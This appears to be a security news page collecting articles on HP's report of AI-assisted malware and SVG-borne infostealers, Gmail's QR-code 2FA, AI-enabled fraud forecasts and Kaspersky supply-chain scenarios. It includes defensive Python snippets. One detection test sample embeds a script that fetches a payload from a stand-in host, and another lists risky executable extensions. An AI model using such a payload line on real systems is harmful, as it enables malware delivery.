
Attackers Use AI to Produce Malware
HP Wolf Security's latest report points to the use of artificial intelligence in creating malware scripts, threat actors relying on malvertising to spread fake PDF tools, and malware embedded in image files.
The latest HP Threat Insights Report, published at HP Imagine, reveals how attackers are using generative AI to help write malicious code. HP's threat research team has detected a large, refined ChromeLoader campaign spread via malvertisements that lead to professional-looking fake PDF tools, and has identified cybercriminals who inject malicious code into SVG images.
The report provides an analysis of real-world cyberattacks, helping organizations stay abreast of the latest techniques cybercriminals are using to evade detection and breach computers in the rapidly changing cybercrime landscape. Based on data from millions of endpoints running HP Wolf Security, key attacks identified by HP threat researchers include:
- Generative AI helps develop malware in the wild: Cybercriminals are already using AI to create convincing phishing lures, but to date there has been limited evidence of threat actors using AI tools to write code. The team detected a campaign targeting French speakers that used VBScript and JavaScript believed to have been written with the help of generative AI. The structure of the scripts, comments explaining each line of code, and the choice of native-language function and variable names are strong indicators that the threat actor used AI to create the malware. The attack infects users with the freely available AsyncRAT malware, an easy-to-obtain information stealer that can record the victim's screen and keystrokes. This activity demonstrates how generative AI lowers the bar for cybercriminals to infect endpoints.
- Subtly crafted malicious advertising campaigns that lead to fake but functional PDF tools: ChromeLoader attacks are getting bigger and more convincing, relying on popular search keywords and malicious ads to direct victims to well-designed websites that offer functional tools like PDF readers and converters. These applications hide malicious code in an MSI file, while valid code signing certificates bypass Windows security policies and user warnings, increasing the likelihood of infection. Installing these fake applications allows attackers to hijack victims’ browsers and redirect searches to attacker-controlled sites.
- Malware hidden in Scalable Vector Graphics (SVG) images: Some cybercriminals are bucking the trend by switching from HTML files to vector images to disguise malware. Vector images, widely used in graphic design, commonly use the XML-based SVG format. Because SVGs open automatically in browsers, any embedded JavaScript is executed when the image is viewed. While victims think they are viewing an image, they are actually interacting with a complex file format that leads to the installation of multiple types of infostealer malware.
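The SVG technique works because browsers treat the format as a document, not a picture: a `<script>` element or an `on*` event attribute inside the XML is executed on view. A minimal detection sketch of that idea is below; the sample SVG strings and the helper name are illustrative assumptions, not taken from HP's report.

```python
# Illustrative check: flag SVG files that contain embedded script or
# event-handler attributes, both of which browsers will execute.
# Sample SVGs below are made up for demonstration.
import xml.etree.ElementTree as ET

def svg_has_script(svg_text: str) -> bool:
    """Return True if the SVG contains <script> elements or on* attributes."""
    root = ET.fromstring(svg_text)
    for elem in root.iter():
        # Tags may be namespaced, e.g. "{http://www.w3.org/2000/svg}script".
        if elem.tag.rsplit("}", 1)[-1] == "script":
            return True
        if any(attr.lower().startswith("on") for attr in elem.attrib):
            return True
    return False

benign = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'
malicious = ('<svg xmlns="http://www.w3.org/2000/svg">'
             '<script>fetch("https://example.invalid/payload")</script></svg>')

print(svg_has_script(benign))     # False
print(svg_has_script(malicious))  # True
```

A real gateway would also need to handle obfuscation (entities, `href` to external scripts, CDATA), which is why such files slip past naive image filters.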
By isolating threats that have evaded detection tools on PCs, while still allowing malware to detonate safely, HP Wolf Security captures specific insights into the latest techniques used by cybercriminals. To date, HP Wolf Security customers have clicked on more than 40 billion email attachments, web pages, and downloaded files with no reported breaches.
Examining data from Q2 2024, the report details how cybercriminals continue to diversify their attack methods to bypass security policies and detection tools:
– At least 12% of email threats identified by HP Sure Click bypassed one or more email gateway scanners, the same rate as in the previous quarter.
– The top threat vectors were email attachments (61%), downloads from browsers (18%), and other infection vectors (21%) such as removable storage (for example, USB flash drives) and file shares.
– Archives were the most popular malware distribution type (39%), of which 26% were ZIP files.
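Archives top the list because a ZIP wrapper hides the payload's true file type from casual inspection. A gateway-style sketch of the countermeasure is shown below: list an attachment's members without extracting them and flag executable extensions. The extension list and file names are assumptions for demonstration, not HP's actual rules.

```python
# Illustrative gateway-style check: inspect a ZIP attachment's member
# names in memory and flag likely-executable payloads. The extension
# list is an assumption, not a complete or authoritative policy.
import io
import zipfile

RISKY_EXTENSIONS = {".exe", ".js", ".vbs", ".scr", ".msi", ".bat", ".lnk"}

def risky_members(zip_bytes: bytes) -> list[str]:
    """Return archive members whose extension looks executable."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist()
                if any(name.lower().endswith(ext) for ext in RISKY_EXTENSIONS)]

# Build a small test archive in memory: a double-extension lure.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("invoice.pdf", b"%PDF-1.7 ...")
    zf.writestr("invoice.pdf.exe", b"MZ...")

print(risky_members(buf.getvalue()))  # ['invoice.pdf.exe']
```

Name-based checks are easily evaded (password-protected or nested archives), which is part of why archive delivery remains popular with attackers.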
HP Wolf Security runs risky tasks in isolated, hardware-hardened virtual machines running at the edge to protect users without impacting their productivity. It also captures detailed traces of infection attempts. HP’s application isolation technology reduces threats that can evade other security tools and provides unique insight into intrusion techniques and behavior of threat actors.
Security
Google Brings QR Code Two-Factor Authentication to Gmail
Google is preparing to make a significant change to increase Gmail’s security.

Gmail has long relied on SMS codes for two-factor authentication (2FA); in the near future it will switch to QR codes. The change is being made because of the security risks of SMS verification and aims to better protect users from cyberattacks.
According to Forbes, the new verification method, which will be available in the next few months, stands out as Google's countermeasure against fraudsters who abuse SMS-based authentication. Google spokesperson Ross Richendrfer said the company is moving to this method to counter the global rise in SMS fraud and phishing attacks. Google is not removing SMS verification entirely; instead of receiving a six-digit code, users will be shown a QR code to scan when signing in to Gmail.
Why is Google switching to QR code verification?
Traditional SMS verification has several security shortcomings:
– Vulnerable to phishing: Codes sent by SMS can be intercepted by scammers. QR codes reduce this risk because there is no shared code to steal.
– SIM swapping: Attackers who hijack a user's phone number can steal their authentication codes.
– SMS traffic fraud: Cybercriminals can deceive service providers into sending large numbers of SMS messages to numbers they control, and profit from the traffic.
Google says QR code-based verification will largely close these security gaps. Under the new system, Gmail users will see a QR code on screen when logging in and will complete authentication by scanning it with a Google app or a device that supports verification.
Google has also recently added a few other important updates to the application, one of which lets Android and iOS users pay invoices directly through Gmail. The company plans to keep improving Gmail's security and functionality. QR code-based two-factor authentication, which will be available to everyone soon, will make logging in to Gmail both safer and easier.
Artificial Intelligence
Is Artificial Intelligence a Security Shield or a Threat Tool?
Artificial intelligence has given a major boost to the cybersecurity arms race in the past year. There will be no break from this race for the next 12 months. This has significant implications for corporate cybersecurity teams and employers, as well as everyday web users.

Security experts have underlined what should be taken into consideration in 2025, noting that in the hands of bad actors, artificial intelligence tools can increase the scale and severity of all kinds of fraud, disinformation campaigns, and other threats.
The UK’s National Cyber Security Centre (NCSC) warned at the start of 2024 that AI is already being used by all types of threat actors and will “increase the volume and impact of cyber attacks over the next two years”. The threat is most visible in the field of social engineering, where generative artificial intelligence (GenAI) can help malicious actors craft persuasive campaigns in error-free local languages.
Although these trends will continue in 2025, we can also see artificial intelligence used for the following purposes:
· Authentication bypass: Deepfake technology used to help scammers impersonate customers in selfie and video-based checks for new account creation and account access.
· Business email compromise (BEC): AI will again be used for social engineering, this time to trick corporate payment approvers into transferring money to an account under the fraudster’s control. Deepfake audio and video can also be used to impersonate CEOs and other senior leaders in phone calls and virtual meetings.
· Imitation scam: Open source large language models (LLMs) will present new opportunities for fraudsters. By training these models on data collected from hacked or public social media accounts, fraudsters can impersonate victims in virtual kidnappings and other scams designed to fool their friends and family.
· Influencer scams: Similarly, we expect to see GenAI used by scammers in 2025 to create fake or duplicate social media accounts impersonating celebrities, influencers, and other public figures. Deepfake videos will be released to trick followers into handing over their personal information and money, for example in investment and crypto scams, including the kind highlighted in ESET’s latest Threat Report. This will put more pressure on social media platforms to offer effective account verification tools and badges, and will require users to stay vigilant.
· Disinformation: Hostile states and other groups will leverage GenAI to easily generate fake content to trick gullible social media users into following fake accounts. These users can then be turned into online amplifiers for influence operations that are more effective and harder to detect than content/troll farms.
· Password cracking: AI-driven tools can mass expose user credentials in seconds to gain access to corporate networks and data, as well as customer accounts.
AI privacy concerns for 2025
Artificial intelligence will not just be a tool for threat actors next year; it will also bring a high risk of data leakage. LLMs need large volumes of text, images, and video for training, and some of this data is often sensitive, such as biometrics, health information, or financial data. In some cases, social media and other companies may change their terms and conditions to allow customer data to be used for model training. Once this information has been ingested by an AI model, it poses a risk to individuals if the AI system itself is hacked or if the information is exposed through GenAI applications running on the LLM.
There is also a concern for enterprise users that they may unknowingly share sensitive business information through GenAI prompts. A fifth of UK companies have inadvertently exposed potentially sensitive corporate data through employee use of GenAI, a survey has found.
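One common mitigation for this kind of accidental exposure is a DLP-style filter that redacts obvious sensitive patterns before a prompt leaves the organization. The sketch below is illustrative only; the regex patterns are minimal assumptions, not a complete data-loss-prevention rule set.

```python
# Hedged sketch of a prompt-sanitizing filter: redact obvious sensitive
# patterns from text before it is sent to an external GenAI service.
# The patterns are illustrative and far from exhaustive.
import re

PATTERNS = {
    "EMAIL": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "CARD": re.compile(r"\b(?:\d[ -]?){13,16}\b"),   # crude card-number shape
    "SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def redact(prompt: str) -> str:
    """Replace each matched pattern with a labeled placeholder."""
    for label, pattern in PATTERNS.items():
        prompt = pattern.sub(f"[{label} REDACTED]", prompt)
    return prompt

print(redact("Summarize the complaint from jane.doe@example.com, "
             "card 4111 1111 1111 1111."))
```

Real deployments typically combine such pattern rules with classifiers and allow-lists, since regexes alone both over- and under-match.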
AI for defenders in 2025
The good news is that AI will play a larger role in the work of cybersecurity teams in the coming year as it is incorporated into new products and services.
- Generating synthetic data to train security tools
- Summarizing long and complex threat intelligence reports for analysts
- Improving SecOps efficiency for overloaded teams by contextualizing and prioritizing alerts and automating workflows for investigation and remediation
- Scanning large data volumes for signs of suspicious behavior
- Skilling IT teams through “co-pilot” functionality built into a variety of products to help reduce the possibility of misconfiguration
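The "scanning large data volumes for signs of suspicious behavior" item above is, at its simplest, statistical anomaly detection. A toy sketch using a z-score over hourly event counts is shown below; real SecOps tooling is far more sophisticated, and the sample data and threshold are made up.

```python
# Toy anomaly-detection sketch: flag hours whose event counts deviate
# strongly from the baseline via a z-score. Illustrative only; the
# login counts and the 3-sigma threshold are assumptions.
import statistics

def anomalous_hours(counts: list[int], threshold: float = 3.0) -> list[int]:
    """Return indices whose count is more than `threshold` std devs from the mean."""
    mean = statistics.fmean(counts)
    stdev = statistics.pstdev(counts)
    if stdev == 0:          # perfectly flat series: nothing to flag
        return []
    return [i for i, c in enumerate(counts)
            if abs(c - mean) / stdev > threshold]

# 23 quiet hours, then a burst of failed logins in the final hour.
logins = [12, 10, 11, 9, 13, 12, 10, 11, 12, 9, 10, 11,
          12, 10, 13, 11, 9, 12, 10, 11, 12, 10, 11, 300]
print(anomalous_hours(logins))  # [23]
```

The point of the list above is that AI-assisted versions of this idea learn the baseline automatically across many signals, rather than relying on a hand-tuned threshold per metric.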
However, IT and security leaders must also understand AI's limitations and the importance of human expertise in decision-making. A balance between human and machine will be needed in 2025 to reduce the risk of hallucinations, model degradation, and other potential negative outcomes. AI is not a magic wand; it should be combined with other tools and techniques for optimum results.
AI challenges in compliance and implementation
The evolution of the threat landscape and AI security does not occur in a vacuum. Geopolitical changes in 2025, especially in the United States, could even lead to deregulation in the technology and social media sectors.
This could enable scammers and other malicious actors to flood online platforms with AI-generated threats. Meanwhile, in the EU, there is still some uncertainty around AI regulation, which could make life more difficult for compliance teams. As legal experts note, codes of practice and guidance still need to be sorted out and liability calculated for AI system failures. Lobbying from the tech sector could change how EU AI law is implemented in practice.
What is clear, however, is that artificial intelligence will fundamentally change the way we interact with technology in 2025, for better and for worse. While it offers great potential benefits for businesses and individuals, it also poses new risks that need to be managed. It would be in everyone’s interest to work more closely over the next year to make sure this happens. Governments, private sector businesses and end users must do their part and work together to harness the potential of AI while mitigating its risks.
Security
Kaspersky on IT Outage and Supply Chain Risk Scenarios
As part of Kaspersky’s annual “Security Bulletin”, the company’s experts analyzed major supply chain attacks and IT outages experienced last year.

In 2024, supply chain attacks and IT outages emerged as prominent cybersecurity concerns, demonstrating that almost no infrastructure is completely immune from risk. A faulty CrowdStrike update affected millions of systems, and sophisticated incidents such as the XZ backdoor and the Polyfill.io supply chain attack highlighted the risks inherent in widely used tools. These and other notable cases underline the need for rigorous security measures, robust patch and update management, and proactive defenses to protect global supply chains and infrastructure.
While evaluating the events of 2024 within the scope of “Story of the Year”, Kaspersky Security Bulletin discusses possible future scenarios and the potential consequences of these scenarios as follows:
But what if a major AI provider experiences an outage or data breach? Businesses increasingly rely on models from providers such as OpenAI, Meta, and Anthropic. Despite the excellent user experience these integrations offer, they also carry significant cyber risk: dependence on a single AI provider, or on a limited number of them, creates concentrated points of failure. If a large artificial intelligence company suffers a critical outage, it can significantly affect the thousands of services that depend on it.
Additionally, an incident at a major AI provider could lead to one of the most serious data leaks since these systems store large amounts of sensitive information.
But what if on-device AI tools are exploited? As AI becomes more integrated into everyday devices, the risk of it becoming an attack vector increases significantly. For example, Kaspersky's Operation Triangulation campaign, revealed last year, showed how attackers can compromise device integrity by exploiting zero-day vulnerabilities in system software and hardware to install advanced spyware. If software or hardware vulnerabilities were discovered in the neural processing units that run AI features, including on platforms such as Apple Intelligence, exploiting them could significantly amplify the scale and impact of attacks that use AI capabilities.
Kaspersky’s Operation Triangulation investigation also uncovered a first-of-its-kind case reported by the company: the misuse of on-device machine learning tools for data extraction. This suggests that features designed to improve user experience are already being weaponized by advanced threat actors.
But what if threat actors disrupt satellite connectivity? Although the space industry has faced various cyber attacks for some time, threat actors' next target may be satellite internet providers, an important element of the global connectivity chain. Satellite internet can provide temporary communication links when other systems are down; airlines, cruise lines, and other operators may rely on it to offer connectivity to passengers, and it can also be used to enable secure communication services.
This creates cyber risk: a targeted cyberattack on, or a faulty update from, a leading or dominant satellite provider could cause internet outages and communication breakdowns, seriously impacting individuals and organizations.
But what if major physical threats to the internet materialize? Continuing on the topic of connectivity, the internet is also vulnerable to physical threats. About 95% of global data is transmitted via undersea cables, and there are roughly 1,500 Internet Exchange Points (IXPs), the physical locations where different networks exchange data traffic. Many of these points are located in data centers.
An outage to just a few critical components of this chain – such as trunk cables or IXPs – could overload the remaining infrastructure and potentially lead to widespread outages, significantly impacting global connectivity.
But what if serious vulnerabilities are exploited in the Windows and Linux kernels? These operating systems run many critical assets around the world: servers, production equipment, logistics systems, IoT devices, and more. A remotely exploitable kernel vulnerability in these systems could expose countless devices and networks worldwide to attack, creating a high-risk situation in which global supply chains could suffer major disruption.
“Supply chain risks may seem daunting, but awareness is the first step to prevention,” said Igor Kuznetsov, Director of Kaspersky's Global Research and Analysis Team (GReAT). “We can reduce single points of failure by rigorously testing updates, using AI-powered anomaly detection, and diversifying providers. We can eliminate weak elements and build resilience. It is also vital to create a culture of responsibility among staff, because human attention is the cornerstone of security. Together, these measures can ensure a safer future by protecting supply chains.”